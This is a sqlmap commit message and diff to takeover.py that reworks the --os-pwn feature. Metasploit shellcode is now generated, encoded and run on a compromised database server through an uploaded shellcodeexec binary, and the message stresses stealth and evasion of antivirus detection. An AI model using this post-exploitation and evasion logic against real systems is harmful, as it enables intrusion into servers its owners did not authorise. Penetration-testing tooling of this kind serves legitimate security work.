Major recode of --os-pwn functionality. Now the Metasploit shellcode can not be run as a Metasploit generated payload stager anymore. Instead it can be run on the target system either via sys_bineval() (as it was before, anti-forensics mode, all the same) or via shellcodeexec executable. Advantages are that:

* It is stealthier as the shellcode itself does not touch the filesystem, it's an argument passed to shellcodeexec at runtime. * shellcodeexec is not (yet) recognized as malicious by any (Avast excluded) AV product. * shellcodeexec binary size is significantly smaller than a Metasploit payload stager (even when packed with UPX). * UPX now is not needed anymore, so sqlmap package is also way smaller and less likely to be detected itself as malicious by your AV software. shellcodeexec source code, compilation files and binaries are in extra/shellcodeexec/ folder now - copied over from https://github.com/inquisb/shellcodeexec. Minor code refactoring.
2025-12-06 20:51:31 +00:00 · 2011-04-24 23:01:21 +00:00
parent d0a534dee5
commit e35f25b2cb
24 changed files with 722 additions and 1426 deletions
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@@ -156,7 +156,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
                errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n"
                errMsg += "If you miss doing that, you will receive "
                errMsg += "information from the database server and it "
-                errMsg += "is unlikely to receive commands send from you"
+                errMsg += "is unlikely to receive commands sent from you"
                logger.error(errMsg)

            if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
@@ -173,7 +173,7 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
                    msg  = "how do you want to execute the Metasploit shellcode "
                    msg += "on the back-end database underlying operating system?"
                    msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
-                    msg += "\n[2] Stand-alone payload stager (file system way)"
+                    msg += "\n[2] Via shellcodeexec (file system way)"

                    while True:
                        choice = readInput(msg, default=1)
@@ -193,10 +193,12 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
                        goUdf = True

                if goUdf:
-                    self.createMsfShellcode(exitfunc="thread", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
+                    exitfunc="thread"
                else:
-                    self.createMsfPayloadStager()
-                    self.uploadMsfPayloadStager()
+                    exitfunc="process"
+
+                self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
+                self.uploadShellcodeexec()

                if Backend.isOs(OS.WINDOWS) and conf.privEsc:
                    if Backend.getIdentifiedDbms() == DBMS.MYSQL:
@@ -239,8 +241,8 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous):
                self.getRemoteTempPath()

                if tunnel == 1:
-                    self.createMsfPayloadStager()
-                    self.uploadMsfPayloadStager(web=web)
+                    self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
+                    self.uploadShellcodeexec(web=web)
                elif tunnel == 2:
                    self.uploadIcmpshSlave(web=web)
                    self.icmpPwn()